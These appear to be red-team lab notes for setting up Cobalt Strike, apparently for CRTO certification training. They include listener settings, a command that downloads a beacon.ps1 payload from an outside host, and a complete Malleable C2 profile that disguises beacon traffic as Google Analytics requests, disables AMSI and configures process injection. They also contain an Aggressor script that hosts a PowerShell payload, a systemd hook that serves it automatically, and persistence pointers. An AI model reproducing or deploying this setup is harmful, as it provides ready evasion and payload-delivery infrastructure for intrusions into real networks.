Prepare Setup

Follow Payload files

Create Listeners HTTP

• Name: http
• Payload: Beacon HTTP
• HTTP Hosts: www.bleepincomputer.com
• HTTP Host (Stager) : www.bleepincomputer.com

SMB

• Name: smb
• Payload: Beacon SMB
• Pipename: TSVCPIPE-4b2f70b3-ceba-42a5-a4b5-704e1c41335

TCP

• Name: tcp
• Payload: Beacon TCP
• Port: 8080
• Bind to localhost: False

TCP (local)

• Name: tcp-local
• Payload: Beacon TCP
• Port: 8443
• Bind to localhost: True

dns

• name: dns
• payload: Beacon DNS
• host: cdn.bleepincomputer.com
• stager: cdn.bleepincomputer.com

Not needed Run a python3 webserver

python3 -m http.server

Not needed Check outbound access to TeamServer

iwr -Uri http://bleepincomputer.com/a
wr -Uri http://bleepincomputer.com/a -OutFile beacon.ps1

change beacon templates follow payload_files

in cobaltstrike load 
C:\Tools\cobaltstrike\custom-artifacts\mailslot\artifact.cna
C:\Tools\cobaltstrike\custom-resources\resources.cna
C:\Tools\SCShell\CS-BOF\scshell.cna

SSH to teamserver Passw0rd!

ssh attacker@‌‌‌10.0.0.5

change the profile example below

nano /opt/cobaltstrike/profiles/default.profile

sudo /usr/bin/docker restart cobaltstrike-cs-1

Custom Malleable C2 Profile for CRTO

# make our C2 look like a Google Web Bug
# https://developers.google.com/analytics/resources/articles/gaTrackingTroubleshooting
#
# Author: @armitagehacker

set sleeptime "5000";
set jitter    "20";
http-get {
        set uri "/__utm.gif";
        client {
                parameter "utmac" "UA-2202604-2";
                parameter "utmcn" "1";
                parameter "utmcs" "ISO-8859-1";
                parameter "utmsr" "1280x1024";
                parameter "utmsc" "32-bit";
                parameter "utmul" "en-US";

                metadata {
                        netbios;
                        prepend "__utma";
                        parameter "utmcc";
                }
        }

        server {
                header "Content-Type" "image/gif";

                output {
                        # hexdump pixel.gif
                        # 0000000 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00
                        # 0000010 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00
                        # 0000020 01 00 01 00 00 02 01 44 00 3b

                        prepend "\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b";
                        prepend "\xff\xff\xff\x21\xf9\x04\x01\x00\x00\x00\x2c\x00\x00\x00\x00";
                        prepend "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00";

                        print;
                }
        }
}

http-post {
        set uri "/___utm.gif";
        client {
                header "Content-Type" "application/octet-stream";

                id {
                        prepend "UA-220";
                        append "-2";
                        parameter "utmac";
                }

                parameter "utmcn" "1";
                parameter "utmcs" "ISO-8859-1";
                parameter "utmsr" "1280x1024";
                parameter "utmsc" "32-bit";
                parameter "utmul" "en-US";

                output {
                        print;
                }
        }

        server {
                header "Content-Type" "image/gif";

                output {
                        prepend "\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b";
                        prepend "\xff\xff\xff\x21\xf9\x04\x01\x00\x00\x00\x2c\x00\x00\x00\x00";
                        prepend "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00";
                        print;
                }
        }
}

# dress up the staging process too
http-stager {
        server {
                header "Content-Type" "image/gif";
        }
}

stage {
   set userwx "false";
   set module_x64 "Hydrogen.dll";  # use a different module if you like
   set copy_pe_header "false";
}


post-ex {
  set amsi_disable "true";
  set spawnto_x64 "%windir%\\sysnative\\svchost.exe";
  set obfuscate "true";
  set cleanup "true";
  set smartinject "true";
  set pipename "TSVCPIPE-########-####-####-####-############";


  transform-x64 {
      strrep "ReflectiveLoader" "NetlogonMain";
      strrepex "ExecuteAssembly" "Invoke_3 on EntryPoint failed." "Assembly threw an exception";
      strrepex "PowerPick" "PowerShellRunner" "PowerShellEngine";

      # add any other transforms that you want
  }
}

process-inject {
   execute {
      NtQueueApcThread-s;
      NtQueueApcThread;
      SetThreadContext;
      CreateThread;
   }
}

Generate all payloads Use Payloads > Windows Stageless Generate All Payloads to replace all of your payloads in C:\Payloads

Keep but likely not needed

Enable Hosting of Web Delivery Payloads via agscript client in headless mode

cat host_payloads.cna

# Connected and ready
on ready {

    # Generate payload
    $payload = artifact_payload("http", "powershell", "x64");

    # Host payload
    site_host("10.10.5.50", 80, "/a", $payload, "text/plain", "Auto Web Delivery (PowerShell)", false);
}

Add below command in "/etc/systemd/system/teamserver.service" file

ExecStartPost=/bin/sh -c '/usr/bin/sleep 30; /home/attacker/cobaltstrike/agscript 127.0.0.1 50050 headless Passw0rd! host_payloads.cna &'

Persistent Aggressor script Copy the aggressor script cna code and paste in the Attacker machine and also copy the sharpersist.exe from Attacker machine Tools and put in the same directory as of persistence cna file. https://github.com/Peco602/cobaltstrike-aggressor-scripts/tree/main/persistence-sharpersist